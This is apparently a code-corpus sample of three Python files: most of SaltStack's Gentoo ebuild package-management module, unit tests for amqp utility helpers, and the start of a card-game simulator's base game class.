return __virtualname__
return (
False,
"The ebuild execution module cannot be loaded: either the system is not Gentoo"
" or the portage python library is not available.",
)
def _vartree():
import portage # pylint: disable=3rd-party-module-not-gated
portage = salt.utils.compat.reload(portage)
return portage.db[portage.root]["vartree"]
def _porttree():
import portage # pylint: disable=3rd-party-module-not-gated
portage = salt.utils.compat.reload(portage)
return portage.db[portage.root]["porttree"]
def _p_to_cp(p):
try:
ret = portage.dep_getkey(p)
if ret:
return ret
except portage.exception.InvalidAtom:
pass
try:
ret = _porttree().dbapi.xmatch("bestmatch-visible", p)
if ret:
return portage.dep_getkey(ret)
except portage.exception.InvalidAtom:
pass
try:
ret = _porttree().dbapi.xmatch("match-all", p)
if ret:
return portage.cpv_getkey(ret[0])
except portage.exception.InvalidAtom:
pass
return None
def _allnodes():
if "portage._allnodes" in __context__:
return __context__["portage._allnodes"]
else:
ret = _porttree().getallnodes()
__context__["portage._allnodes"] = ret
return ret
def _cpv_to_cp(cpv):
try:
ret = portage.dep_getkey(cpv)
if ret:
return ret
except portage.exception.InvalidAtom:
pass
try:
ret = portage.cpv_getkey(cpv)
if ret:
return ret
except portage.exception.InvalidAtom:
pass
return cpv
def _cpv_to_version(cpv):
return portage.versions.cpv_getversion(cpv)
def _process_emerge_err(stdout, stderr):
"""
Used to parse emerge output to provide meaningful output when emerge fails
"""
ret = {}
rexp = re.compile(r"^[<>=][^ ]+/[^ ]+ [^\n]+", re.M)
slot_conflicts = re.compile(r"^[^ \n]+/[^ ]+:[^ ]", re.M).findall(stderr)
if slot_conflicts:
ret["slot conflicts"] = slot_conflicts
blocked = re.compile(
r"(?m)^\[blocks .+\] " r"([^ ]+/[^ ]+-[0-9]+[^ ]+)" r".*$"
).findall(stdout)
unsatisfied = re.compile(r"Error: The above package list contains").findall(stderr)
# If there were blocks and emerge could not resolve it.
if blocked and unsatisfied:
ret["blocked"] = blocked
sections = re.split("\n\n", stderr)
for section in sections:
if "The following keyword changes" in section:
ret["keywords"] = rexp.findall(section)
elif "The following license changes" in section:
ret["license"] = rexp.findall(section)
elif "The following USE changes" in section:
ret["use"] = rexp.findall(section)
elif "The following mask changes" in section:
ret["mask"] = rexp.findall(section)
return ret
def check_db(*names, **kwargs):
"""
.. versionadded:: 0.17.0
Returns a dict containing the following information for each specified
package:
1. A key ``found``, which will be a boolean value denoting if a match was
found in the package database.
2. If ``found`` is ``False``, then a second key called ``suggestions`` will
be present, which will contain a list of possible matches. This list
will be empty if the package name was specified in ``category/pkgname``
format, since the suggestions are only intended to disambiguate
ambiguous package names (ones submitted without a category).
CLI Examples:
.. code-block:: bash
salt '*' pkg.check_db <package1> <package2> <package3>
"""
### NOTE: kwargs is not used here but needs to be present due to it being
### required in the check_db function in other package providers.
ret = {}
for name in names:
if name in ret:
log.warning("pkg.check_db: Duplicate package name '%s' submitted", name)
continue
if "/" not in name:
ret.setdefault(name, {})["found"] = False
ret[name]["suggestions"] = porttree_matches(name)
else:
ret.setdefault(name, {})["found"] = name in _allnodes()
if ret[name]["found"] is False:
ret[name]["suggestions"] = []
return ret
def ex_mod_init(low):
"""
If the config option ``ebuild.enforce_nice_config`` is set to True, this
module will enforce a nice tree structure for /etc/portage/package.*
configuration files.
.. versionadded:: 0.17.0
Initial automatic enforcement added when pkg is used on a Gentoo system.
.. versionchanged:: 2014.7.0
Configure option added to make this behaviour optional, defaulting to
off.
.. seealso::
``ebuild.ex_mod_init`` is called automatically when a state invokes a
pkg state on a Gentoo system.
:py:func:`salt.states.pkg.mod_init`
``ebuild.ex_mod_init`` uses ``portage_config.enforce_nice_config`` to do
the lifting.
:py:func:`salt.modules.portage_config.enforce_nice_config`
CLI Example:
.. code-block:: bash
salt '*' pkg.ex_mod_init
"""
if __salt__["config.get"]("ebuild.enforce_nice_config", False):
__salt__["portage_config.enforce_nice_config"]()
return True
def latest_version(*names, **kwargs):
"""
Return the latest version of the named package available for upgrade or
installation. If more than one package name is specified, a dict of
name/version pairs is returned.
CLI Example:
.. code-block:: bash
salt '*' pkg.latest_version <package name>
salt '*' pkg.latest_version <package1> <package2> <package3> ...
"""
refresh = salt.utils.data.is_true(kwargs.pop("refresh", True))
if not names:
return ""
# Refresh before looking for the latest version available
if refresh:
refresh_db()
ret = {}
# Initialize the dict with empty strings
for name in names:
ret[name] = ""
installed = _cpv_to_version(_vartree().dep_bestmatch(name))
avail = _cpv_to_version(_porttree().dep_bestmatch(name))
if avail and (
not installed
or salt.utils.versions.compare(
ver1=installed, oper="<", ver2=avail, cmp_func=version_cmp
)
):
ret[name] = avail
# Return a string if only one package name passed
if len(names) == 1:
return ret[names[0]]
return ret
# available_version is being deprecated
available_version = salt.utils.functools.alias_function(
latest_version, "available_version"
)
def _get_upgradable(backtrack=3):
"""
Utility function to get upgradable packages
Sample return data:
{ 'pkgname': '1.2.3-45', ... }
"""
cmd = [
"emerge",
"--ask",
"n",
"--backtrack",
"{}".format(backtrack),
"--pretend",
"--update",
"--newuse",
"--deep",
"@world",
]
call = __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
if call["retcode"] != 0:
msg = "Failed to get upgrades"
for key in ("stderr", "stdout"):
if call[key]:
msg += ": " + call[key]
break
raise CommandExecutionError(msg)
else:
out = call["stdout"]
rexp = re.compile(
r"(?m)^\[.+\] "
r"([^ ]+/[^ ]+)" # Package string
"-"
r"([0-9]+[^ ]+)" # Version
r".*$"
)
keys = ["name", "version"]
_get = lambda l, k: l[keys.index(k)]
upgrades = rexp.findall(out)
ret = {}
for line in upgrades:
name = _get(line, "name")
version_num = _get(line, "version")
ret[name] = version_num
return ret
def list_upgrades(refresh=True, backtrack=3, **kwargs): # pylint: disable=W0613
"""
List all available package upgrades.
refresh
Whether or not to sync the portage tree before checking for upgrades.
backtrack
Specifies an integer number of times to backtrack if dependency
calculation fails due to a conflict or an unsatisfied dependency
(default: ´3´).
.. versionadded:: 2015.8.0
CLI Example:
.. code-block:: bash
salt '*' pkg.list_upgrades
"""
if salt.utils.data.is_true(refresh):
refresh_db()
return _get_upgradable(backtrack)
def upgrade_available(name, **kwargs):
"""
Check whether or not an upgrade is available for a given package
CLI Example:
.. code-block:: bash
salt '*' pkg.upgrade_available <package name>
"""
return latest_version(name) != ""
def version(*names, **kwargs):
"""
Returns a string representing the package version or an empty string if not
installed. If more than one package name is specified, a dict of
name/version pairs is returned.
CLI Example:
.. code-block:: bash
salt '*' pkg.version <package name>
salt '*' pkg.version <package1> <package2> <package3> ...
"""
return __salt__["pkg_resource.version"](*names, **kwargs)
def porttree_matches(name):
"""
Returns a list containing the matches for a given package name from the
portage tree. Note that the specific version of the package will not be
provided for packages that have several versions in the portage tree, but
rather the name of the package (i.e. "dev-python/paramiko").
"""
matches = []
for category in _porttree().dbapi.categories:
if _porttree().dbapi.cp_list(category + "/" + name):
matches.append(category + "/" + name)
return matches
def _list_pkgs_from_context(versions_as_list):
"""
Use pkg list from __context__
"""
if versions_as_list:
return __context__["pkg.list_pkgs"]
else:
ret = copy.deepcopy(__context__["pkg.list_pkgs"])
__salt__["pkg_resource.stringify"](ret)
return ret
def list_pkgs(versions_as_list=False, **kwargs):
"""
List the packages currently installed in a dict::
{'<package_name>': '<version>'}
CLI Example:
.. code-block:: bash
salt '*' pkg.list_pkgs
"""
versions_as_list = salt.utils.data.is_true(versions_as_list)
# not yet implemented or not applicable
if any(
[salt.utils.data.is_true(kwargs.get(x)) for x in ("removed", "purge_desired")]
):
return {}
if "pkg.list_pkgs" in __context__ and kwargs.get("use_context", True):
return _list_pkgs_from_context(versions_as_list)
ret = {}
pkgs = _vartree().dbapi.cpv_all()
for cpv in pkgs:
__salt__["pkg_resource.add_pkg"](ret, _cpv_to_cp(cpv), _cpv_to_version(cpv))
__salt__["pkg_resource.sort_pkglist"](ret)
__context__["pkg.list_pkgs"] = copy.deepcopy(ret)
if not versions_as_list:
__salt__["pkg_resource.stringify"](ret)
return ret
def refresh_db(**kwargs):
"""
Update the portage tree using the first available method from the following
list:
- emaint sync
- eix-sync
- emerge-webrsync
- emerge --sync
To prevent the portage tree from being synced within one day of the
previous sync, add the following pillar data for this minion:
.. code-block:: yaml
portage:
sync_wait_one_day: True
CLI Example:
.. code-block:: bash
salt '*' pkg.refresh_db
"""
has_emaint = os.path.isdir("/etc/portage/repos.conf")
has_eix = True if "eix.sync" in __salt__ else False
has_webrsync = (
True if __salt__["makeconf.features_contains"]("webrsync-gpg") else False
)
# Remove rtag file to keep multiple refreshes from happening in pkg states
salt.utils.pkg.clear_rtag(__opts__)
# Option to prevent syncing package tree if done in the last 24 hours
if __salt__["pillar.get"]("portage:sync_wait_one_day", False):
main_repo_root = __salt__["cmd.run"]("portageq get_repo_path / gentoo")
day = datetime.timedelta(days=1)
now = datetime.datetime.now()
timestamp = datetime.datetime.fromtimestamp(os.path.getmtime(main_repo_root))
if now - timestamp < day:
log.info(
"Did not sync package tree since last sync was done at"
" %s, less than 1 day ago",
timestamp,
)
return False
if has_emaint:
return __salt__["cmd.retcode"]("emaint sync -a") == 0
elif has_eix:
return __salt__["eix.sync"]()
elif has_webrsync:
# GPG sign verify is supported only for 'webrsync'
cmd = "emerge-webrsync -q"
# Prefer 'delta-webrsync' to 'webrsync'
if salt.utils.path.which("emerge-delta-webrsync"):
cmd = "emerge-delta-webrsync -q"
return __salt__["cmd.retcode"](cmd) == 0
else:
# Default to deprecated `emerge --sync` form
return __salt__["cmd.retcode"]("emerge --ask n --quiet --sync") == 0
def _flags_changed(inst_flags, conf_flags):
"""
@type inst_flags: list
@param inst_flags: list of use flags which were used
when package was installed
@type conf_flags: list
@param conf_flags: list of use flags form portage/package.use
@rtype: bool
@return: True, if lists have changes
"""
conf_flags = conf_flags[:]
for i in inst_flags:
try:
conf_flags.remove(i)
except ValueError:
return True
return True if conf_flags else False
def install(
name=None,
refresh=False,
pkgs=None,
sources=None,
slot=None,
fromrepo=None,
uses=None,
binhost=None,
**kwargs
):
"""
.. versionchanged:: 2015.8.12,2016.3.3,2016.11.0
On minions running systemd>=205, `systemd-run(1)`_ is now used to
isolate commands which modify installed packages from the
``salt-minion`` daemon's control group. This is done to keep systemd
from killing any emerge commands spawned by Salt when the
``salt-minion`` service is restarted. (see ``KillMode`` in the
`systemd.kill(5)`_ manpage for more information). If desired, usage of
`systemd-run(1)`_ can be suppressed by setting a :mod:`config option
<salt.modules.config.get>` called ``systemd.scope``, with a value of
``False`` (no quotes).
.. _`systemd-run(1)`: https://www.freedesktop.org/software/systemd/man/systemd-run.html
.. _`systemd.kill(5)`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html
Install the passed package(s), add refresh=True to sync the portage tree
before package is installed.
name
The name of the package to be installed. Note that this parameter is
ignored if either "pkgs" or "sources" is passed. Additionally, please
note that this option can only be used to emerge a package from the
portage tree. To install a tbz2 package manually, use the "sources"
option described below.
CLI Example:
.. code-block:: bash
salt '*' pkg.install <package name>
refresh
Whether or not to sync the portage tree before installing.
version
Install a specific version of the package, e.g. 1.0.9-r1. Ignored
if "pkgs" or "sources" is passed.
slot
Similar to version, but specifies a valid slot to be installed. It
will install the latest available version in the specified slot.
Ignored if "pkgs" or "sources" or "version" is passed.
CLI Example:
.. code-block:: bash
salt '*' pkg.install sys-devel/gcc slot='4.4'
fromrepo
Similar to slot, but specifies the repository from the package will be
installed. It will install the latest available version in the
specified repository.
Ignored if "pkgs" or "sources" or "version" is passed.
CLI Example:
.. code-block:: bash
salt '*' pkg.install salt fromrepo='gentoo'
uses
Similar to slot, but specifies a list of use flag.
Ignored if "pkgs" or "sources" or "version" is passed.
CLI Example:
.. code-block:: bash
salt '*' pkg.install sys-devel/gcc uses='["nptl","-nossp"]'
Multiple Package Installation Options:
pkgs
A list of packages to install from the portage tree. Must be passed as
a python list.
CLI Example:
.. code-block:: bash
salt '*' pkg.install pkgs='["foo","bar","~category/package:slot::repository[use]"]'
sources
A list of tbz2 packages to install. Must be passed as a list of dicts,
with the keys being package names, and the values being the source URI
or local path to the package.
CLI Example:
.. code-block:: bash
salt '*' pkg.install sources='[{"foo": "salt://foo.tbz2"},{"bar": "salt://bar.tbz2"}]'
binhost
has two options try and force.
try - tells emerge to try and install the package from a configured binhost.
force - forces emerge to install the package from a binhost otherwise it fails out.
Returns a dict containing the new package names and versions::
{'<package>': {'old': '<old-version>',
'new': '<new-version>'}}
"""
log.debug(
"Called modules.pkg.install: %s",
{
"name": name,
"refresh": refresh,
"pkgs": pkgs,
"sources": sources,
"kwargs": kwargs,
"binhost": binhost,
},
)
if salt.utils.data.is_true(refresh):
refresh_db()
try:
pkg_params, pkg_type = __salt__["pkg_resource.parse_targets"](
name, pkgs, sources, **kwargs
)
except MinionError as exc:
raise CommandExecutionError(exc)
# Handle version kwarg for a single package target
if pkgs is None and sources is None:
version_num = kwargs.get("version")
if not version_num:
version_num = ""
if slot is not None:
version_num += ":{}".format(slot)
if fromrepo is not None:
version_num += "::{}".format(fromrepo)
if uses is not None:
version_num += "[{}]".format(",".join(uses))
pkg_params = {name: version_num}
if not pkg_params:
return {}
elif pkg_type == "file":
emerge_opts = ["tbz2file"]
else:
emerge_opts = []
if binhost == "try":
bin_opts = ["-g"]
elif binhost == "force":
bin_opts = ["-G"]
else:
bin_opts = []
changes = {}
if pkg_type == "repository":
targets = list()
for param, version_num in pkg_params.items():
original_param = param
param = _p_to_cp(param)
if param is None:
raise portage.dep.InvalidAtom(original_param)
if version_num is None:
targets.append(param)
else:
keyword = None
match = re.match("^(~)?([<>])?(=)?([^<>=]*)$", version_num)
if match:
keyword, gt_lt, eq, verstr = match.groups()
prefix = gt_lt or ""
prefix += eq or ""
# If no prefix characters were supplied and verstr contains a version, use '='
if len(verstr) > 0 and verstr[0] != ":" and verstr[0] != "[":
prefix = prefix or "="
target = "{}{}-{}".format(prefix, param, verstr)
else:
target = "{}{}".format(param, verstr)
else:
target = "{}".format(param)
if "[" in target:
old = __salt__["portage_config.get_flags_from_package_conf"](
"use", target
)
__salt__["portage_config.append_use_flags"](target)
new = __salt__["portage_config.get_flags_from_package_conf"](
"use", target
)
if old != new:
changes[param + "-USE"] = {"old": old, "new": new}
target = target[: target.rfind("[")]
if keyword is not None:
__salt__["portage_config.append_to_package_conf"](
"accept_keywords", target, ["~ARCH"]
)
changes[param + "-ACCEPT_KEYWORD"] = {"old": "", "new": "~ARCH"}
if not changes:
inst_v = version(param)
# Prevent latest_version from calling refresh_db. Either we
# just called it or we were asked not to.
if latest_version(param, refresh=False) == inst_v:
all_uses = __salt__["portage_config.get_cleared_flags"](param)
if _flags_changed(*all_uses):
changes[param] = {
"version": inst_v,
"old": {"use": all_uses[0]},
"new": {"use": all_uses[1]},
}
targets.append(target)
else:
targets = pkg_params
cmd = []
if salt.utils.systemd.has_scope(__context__) and __salt__["config.get"](
"systemd.scope", True
):
cmd.extend(["systemd-run", "--scope"])
cmd.extend(["emerge", "--ask", "n", "--quiet"])
cmd.extend(bin_opts)
cmd.extend(emerge_opts)
cmd.extend(targets)
old = list_pkgs()
call = __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
if call["retcode"] != 0:
needed_changes = _process_emerge_err(call["stdout"], call["stderr"])
else:
needed_changes = []
__context__.pop("pkg.list_pkgs", None)
new = list_pkgs()
changes.update(salt.utils.data.compare_dicts(old, new))
if needed_changes:
raise CommandExecutionError(
"Error occurred installing package(s)",
info={"needed changes": needed_changes, "changes": changes},
)
return changes
def update(pkg, slot=None, fromrepo=None, refresh=False, binhost=None, **kwargs):
"""
.. versionchanged:: 2015.8.12,2016.3.3,2016.11.0
On minions running systemd>=205, `systemd-run(1)`_ is now used to
isolate commands which modify installed packages from the
``salt-minion`` daemon's control group. This is done to keep systemd
from killing any emerge commands spawned by Salt when the
``salt-minion`` service is restarted. (see ``KillMode`` in the
`systemd.kill(5)`_ manpage for more information). If desired, usage of
`systemd-run(1)`_ can be suppressed by setting a :mod:`config option
<salt.modules.config.get>` called ``systemd.scope``, with a value of
``False`` (no quotes).
.. _`systemd-run(1)`: https://www.freedesktop.org/software/systemd/man/systemd-run.html
.. _`systemd.kill(5)`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html
Updates the passed package (emerge --update package)
slot
Restrict the update to a particular slot. It will update to the
latest version within the slot.
fromrepo
Restrict the update to a particular repository. It will update to the
latest version within the repository.
binhost
has two options try and force.
try - tells emerge to try and install the package from a configured binhost.
force - forces emerge to install the package from a binhost otherwise it fails out.
Return a dict containing the new package names and versions::
{'<package>': {'old': '<old-version>',
'new': '<new-version>'}}
CLI Example:
.. code-block:: bash
salt '*' pkg.update <package name>
"""
if salt.utils.data.is_true(refresh):
refresh_db()
full_atom = pkg
if slot is not None:
full_atom = "{}:{}".format(full_atom, slot)
if fromrepo is not None:
full_atom = "{}::{}".format(full_atom, fromrepo)
if binhost == "try":
bin_opts = ["-g"]
elif binhost == "force":
bin_opts = ["-G"]
else:
bin_opts = []
old = list_pkgs()
cmd = []
if salt.utils.systemd.has_scope(__context__) and __salt__["config.get"](
"systemd.scope", True
):
cmd.extend(["systemd-run", "--scope"])
cmd.extend(["emerge", "--ask", "n", "--quiet", "--update", "--newuse", "--oneshot"])
cmd.extend(bin_opts)
cmd.append(full_atom)
call = __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
if call["retcode"] != 0:
needed_changes = _process_emerge_err(call["stdout"], call["stderr"])
else:
needed_changes = []
__context__.pop("pkg.list_pkgs", None)
new = list_pkgs()
ret = salt.utils.data.compare_dicts(old, new)
if needed_changes:
raise CommandExecutionError(
"Problem encountered updating package(s)",
info={"needed_changes": needed_changes, "changes": ret},
)
return ret
def upgrade(refresh=True, binhost=None, backtrack=3, **kwargs):
"""
.. versionchanged:: 2015.8.12,2016.3.3,2016.11.0
On minions running systemd>=205, `systemd-run(1)`_ is now used to
isolate commands which modify installed packages from the
``salt-minion`` daemon's control group. This is done to keep systemd
from killing any emerge commands spawned by Salt when the
``salt-minion`` service is restarted. (see ``KillMode`` in the
`systemd.kill(5)`_ manpage for more information). If desired, usage of
`systemd-run(1)`_ can be suppressed by setting a :mod:`config option
<salt.modules.config.get>` called ``systemd.scope``, with a value of
``False`` (no quotes).
.. _`systemd-run(1)`: https://www.freedesktop.org/software/systemd/man/systemd-run.html
.. _`systemd.kill(5)`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html
Run a full system upgrade (emerge -uDN @world)
binhost
has two options try and force.
try - tells emerge to try and install the package from a configured binhost.
force - forces emerge to install the package from a binhost otherwise it fails out.
backtrack
Specifies an integer number of times to backtrack if dependency
calculation fails due to a conflict or an unsatisfied dependency
(default: ´3´).
.. versionadded:: 2015.8.0
Returns a dictionary containing the changes:
.. code-block:: python
{'<package>': {'old': '<old-version>',
'new': '<new-version>'}}
CLI Example:
.. code-block:: bash
salt '*' pkg.upgrade
"""
ret = {"changes": {}, "result": True, "comment": ""}
if salt.utils.data.is_true(refresh):
refresh_db()
if binhost == "try":
bin_opts = ["--getbinpkg"]
elif binhost == "force":
bin_opts = ["--getbinpkgonly"]
else:
bin_opts = []
old = list_pkgs()
cmd = []
if salt.utils.systemd.has_scope(__context__) and __salt__["config.get"](
"systemd.scope", True
):
cmd.extend(["systemd-run", "--scope"])
cmd.extend(
[
"emerge",
"--ask",
"n",
"--quiet",
"--backtrack",
"{}".format(backtrack),
"--update",
"--newuse",
"--deep",
]
)
if bin_opts:
cmd.extend(bin_opts)
cmd.append("@world")
result = __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
__context__.pop("pkg.list_pkgs", None)
new = list_pkgs()
ret = salt.utils.data.compare_dicts(old, new)
if result["retcode"] != 0:
raise CommandExecutionError(
"Problem encountered upgrading packages",
info={"changes": ret, "result": result},
)
return ret
def remove(name=None, slot=None, fromrepo=None, pkgs=None, **kwargs):
"""
.. versionchanged:: 2015.8.12,2016.3.3,2016.11.0
On minions running systemd>=205, `systemd-run(1)`_ is now used to
isolate commands which modify installed packages from the
``salt-minion`` daemon's control group. This is done to keep systemd
from killing any emerge commands spawned by Salt when the
``salt-minion`` service is restarted. (see ``KillMode`` in the
`systemd.kill(5)`_ manpage for more information). If desired, usage of
`systemd-run(1)`_ can be suppressed by setting a :mod:`config option
<salt.modules.config.get>` called ``systemd.scope``, with a value of
``False`` (no quotes).
.. _`systemd-run(1)`: https://www.freedesktop.org/software/systemd/man/systemd-run.html
.. _`systemd.kill(5)`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html
Remove packages via emerge --unmerge.
name
The name of the package to be deleted.
slot
Restrict the remove to a specific slot. Ignored if ``name`` is None.
fromrepo
Restrict the remove to a specific slot. Ignored if ``name`` is None.
Multiple Package Options:
pkgs
Uninstall multiple packages. ``slot`` and ``fromrepo`` arguments are
ignored if this argument is present. Must be passed as a python list.
.. versionadded:: 0.16.0
Returns a dict containing the changes.
CLI Example:
.. code-block:: bash
salt '*' pkg.remove <package name>
salt '*' pkg.remove <package name> slot=4.4 fromrepo=gentoo
salt '*' pkg.remove <package1>,<package2>,<package3>
salt '*' pkg.remove pkgs='["foo", "bar"]'
"""
try:
pkg_params = __salt__["pkg_resource.parse_targets"](name, pkgs)[0]
except MinionError as exc:
raise CommandExecutionError(exc)
old = list_pkgs()
if (
name
and not pkgs
and (slot is not None or fromrepo is not None)
and len(pkg_params) == 1
):
fullatom = name
if slot is not None:
targets = ["{}:{}".format(fullatom, slot)]
if fromrepo is not None:
targets = ["{}::{}".format(fullatom, fromrepo)]
targets = [fullatom]
else:
targets = [x for x in pkg_params if x in old]
if not targets:
return {}
cmd = []
if salt.utils.systemd.has_scope(__context__) and __salt__["config.get"](
"systemd.scope", True
):
cmd.extend(["systemd-run", "--scope"])
cmd.extend(["emerge", "--ask", "n", "--quiet", "--unmerge", "--quiet-unmerge-warn"])
cmd.extend(targets)
out = __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
if out["retcode"] != 0 and out["stderr"]:
errors = [out["stderr"]]
else:
errors = []
__context__.pop("pkg.list_pkgs", None)
new = list_pkgs()
ret = salt.utils.data.compare_dicts(old, new)
if errors:
raise CommandExecutionError(
"Problem encountered removing package(s)",
info={"errors": errors, "changes": ret},
)
return ret
def purge(name=None, slot=None, fromrepo=None, pkgs=None, **kwargs):
"""
.. versionchanged:: 2015.8.12,2016.3.3,2016.11.0
On minions running systemd>=205, `systemd-run(1)`_ is now used to
isolate commands which modify installed packages from the
``salt-minion`` daemon's control group. This is done to keep systemd
from killing any emerge commands spawned by Salt when the
``salt-minion`` service is restarted. (see ``KillMode`` in the
`systemd.kill(5)`_ manpage for more information). If desired, usage of
`systemd-run(1)`_ can be suppressed by setting a :mod:`config option
<salt.modules.config.get>` called ``systemd.scope``, with a value of
``False`` (no quotes).
.. _`systemd-run(1)`: https://www.freedesktop.org/software/systemd/man/systemd-run.html
.. _`systemd.kill(5)`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html
Portage does not have a purge, this function calls remove followed
by depclean to emulate a purge process
name
The name of the package to be deleted.
slot
Restrict the remove to a specific slot. Ignored if name is None.
fromrepo
Restrict the remove to a specific slot. Ignored if ``name`` is None.
Multiple Package Options:
pkgs
Uninstall multiple packages. ``slot`` and ``fromrepo`` arguments are
ignored if this argument is present. Must be passed as a python list.
.. versionadded:: 0.16.0
Returns a dict containing the changes.
CLI Example:
.. code-block:: bash
salt '*' pkg.purge <package name>
salt '*' pkg.purge <package name> slot=4.4
salt '*' pkg.purge <package1>,<package2>,<package3>
salt '*' pkg.purge pkgs='["foo", "bar"]'
"""
ret = remove(name=name, slot=slot, fromrepo=fromrepo, pkgs=pkgs)
ret.update(depclean(name=name, slot=slot, fromrepo=fromrepo, pkgs=pkgs))
return ret
def depclean(name=None, slot=None, fromrepo=None, pkgs=None):
"""
Portage has a function to remove unused dependencies. If a package
is provided, it will only removed the package if no other package
depends on it.
name
The name of the package to be cleaned.
slot
Restrict the remove to a specific slot. Ignored if ``name`` is None.
fromrepo
Restrict the remove to a specific slot. Ignored if ``name`` is None.
pkgs
Clean multiple packages. ``slot`` and ``fromrepo`` arguments are
ignored if this argument is present. Must be passed as a python list.
Return a list containing the removed packages:
CLI Example:
.. code-block:: bash
salt '*' pkg.depclean <package name>
"""
try:
pkg_params = __salt__["pkg_resource.parse_targets"](name, pkgs)[0]
except MinionError as exc:
raise CommandExecutionError(exc)
old = list_pkgs()
if (
name
and not pkgs
and (slot is not None or fromrepo is not None)
and len(pkg_params) == 1
):
fullatom = name
if slot is not None:
targets = ["{}:{}".format(fullatom, slot)]
if fromrepo is not None:
targets = ["{}::{}".format(fullatom, fromrepo)]
targets = [fullatom]
else:
targets = [x for x in pkg_params if x in old]
cmd = ["emerge", "--ask", "n", "--quiet", "--depclean"] + targets
__salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
__context__.pop("pkg.list_pkgs", None)
new = list_pkgs()
return salt.utils.data.compare_dicts(old, new)
def version_cmp(pkg1, pkg2, **kwargs):
"""
Do a cmp-style comparison on two packages. Return -1 if pkg1 < pkg2, 0 if
pkg1 == pkg2, and 1 if pkg1 > pkg2. Return None if there was a problem
making the comparison.
CLI Example:
.. code-block:: bash
salt '*' pkg.version_cmp '0.2.4-0' '0.2.4.1-0'
"""
# ignore_epoch is not supported here, but has to be included for API
# compatibility. Rather than putting this argument into the function
# definition (and thus have it show up in the docs), we just pop it out of
# the kwargs dict and then raise an exception if any kwargs other than
# ignore_epoch were passed.
kwargs = salt.utils.args.clean_kwargs(**kwargs)
kwargs.pop("ignore_epoch", None)
if kwargs:
salt.utils.args.invalid_kwargs(kwargs)
regex = r"^~?([^:\[]+):?[^\[]*\[?.*$"
ver1 = re.match(regex, pkg1)
ver2 = re.match(regex, pkg2)
if ver1 and ver2:
return portage.versions.vercmp(ver1.group(1), ver2.group(1))
return None
def version_clean(version):
"""
Clean the version string removing extra data.
CLI Example:
.. code-block:: bash
salt '*' pkg.version_clean <version_string>
"""
return re.match(r"^~?[<>]?=?([^<>=:\[]+).*$", version)
def check_extra_requirements(pkgname, pkgver):
"""
Check if the installed package already has the given requirements.
CLI Example:
.. code-block:: bash
salt '*' pkg.check_extra_requirements 'sys-devel/gcc' '~>4.1.2:4.1::gentoo[nls,fortran]'
"""
keyword = None
match = re.match("^(~)?([<>])?(=)?([^<>=]*)$", pkgver)
if match:
keyword, gt_lt, eq, verstr = match.groups()
prefix = gt_lt or ""
prefix += eq or ""
# We need to delete quotes around use flag list elements
verstr = verstr.replace("'", "")
# If no prefix characters were supplied and verstr contains a version, use '='
if verstr[0] != ":" and verstr[0] != "[":
prefix = prefix or "="
atom = "{}{}-{}".format(prefix, pkgname, verstr)
else:
atom = "{}{}".format(pkgname, verstr)
else:
return True
try:
cpv = _porttree().dbapi.xmatch("bestmatch-visible", atom)
except portage.exception.InvalidAtom as iae:
log.error("Unable to find a matching package for %s: (%s)", atom, iae)
return False
if cpv == "":
return False
try:
cur_repo, cur_use = _vartree().dbapi.aux_get(cpv, ["repository", "USE"])
except KeyError:
return False
des_repo = re.match(r"^.+::([^\[]+).*$", atom)
if des_repo and des_repo.group(1) != cur_repo:
return False
des_uses = set(portage.dep.dep_getusedeps(atom))
cur_use = cur_use.split()
if (
len(
[x for x in des_uses.difference(cur_use) if x[0] != "-" or x[1:] in cur_use]
)
> 0
):
return False
if keyword:
if not __salt__["portage_config.has_flag"]("accept_keywords", atom, "~ARCH"):
return False
return True
| saltstack/salt | salt/modules/ebuildpkg.py | Python | apache-2.0 | 39,670 |
from __future__ import absolute_import, unicode_literals
from case import Mock, patch
from amqp.five import text_t
from amqp.utils import (NullHandler, bytes_to_str, coro, get_errno, get_logger,
str_to_bytes)
class test_get_errno:
def test_has_attr(self):
exc = KeyError('foo')
exc.errno = 23
assert get_errno(exc) == 23
def test_in_args(self):
exc = KeyError(34, 'foo')
exc.args = (34, 'foo')
assert get_errno(exc) == 34
def test_args_short(self):
exc = KeyError(34)
assert not get_errno(exc)
def test_no_args(self):
assert not get_errno(object())
class test_coro:
def test_advances(self):
@coro
def x():
yield 1
yield 2
it = x()
assert next(it) == 2
class test_str_to_bytes:
def test_from_unicode(self):
assert isinstance(str_to_bytes(u'foo'), bytes)
def test_from_bytes(self):
assert isinstance(str_to_bytes(b'foo'), bytes)
def test_supports_surrogates(self):
bytes_with_surrogates = '\ud83d\ude4f'.encode('utf-8', 'surrogatepass')
assert str_to_bytes(u'\ud83d\ude4f') == bytes_with_surrogates
class test_bytes_to_str:
def test_from_unicode(self):
assert isinstance(bytes_to_str(u'foo'), text_t)
def test_from_bytes(self):
assert bytes_to_str(b'foo')
def test_support_surrogates(self):
assert bytes_to_str(u'\ud83d\ude4f') == u'\ud83d\ude4f'
class test_NullHandler:
def test_emit(self):
NullHandler().emit(Mock(name='record'))
class test_get_logger:
def test_as_str(self):
with patch('logging.getLogger') as getLogger:
x = get_logger('foo.bar')
getLogger.assert_called_with('foo.bar')
assert x is getLogger()
def test_as_logger(self):
with patch('amqp.utils.NullHandler') as _NullHandler:
m = Mock(name='logger')
m.handlers = None
x = get_logger(m)
assert x is m
x.addHandler.assert_called_with(_NullHandler())
| pexip/os-python-amqp | t/unit/test_utils.py | Python | lgpl-2.1 | 2,126 |
import logging
import random
import time
from calendar import timegm
from itertools import chain
from .actions import Attack, BeginTurn, Death, EndTurn, EventListener
from .card import Card, THE_COIN
from .entity import Entity
from .enums import CardType, PlayState, Step, Zone
from .managers import GameManager
from .utils import CardList
class GameOver(Exception):
pass
class BaseGame(Entity):
type = CardType.GAME
MAX_MINIONS_ON_FIELD = 7
Manager = GameManager
def __init__(self, players):
self.data = None
super().__init__()
self.players = players
for player in players:
player.game = self
self.step = None
self.next_step = None
self.turn = 0
self.current_player = None
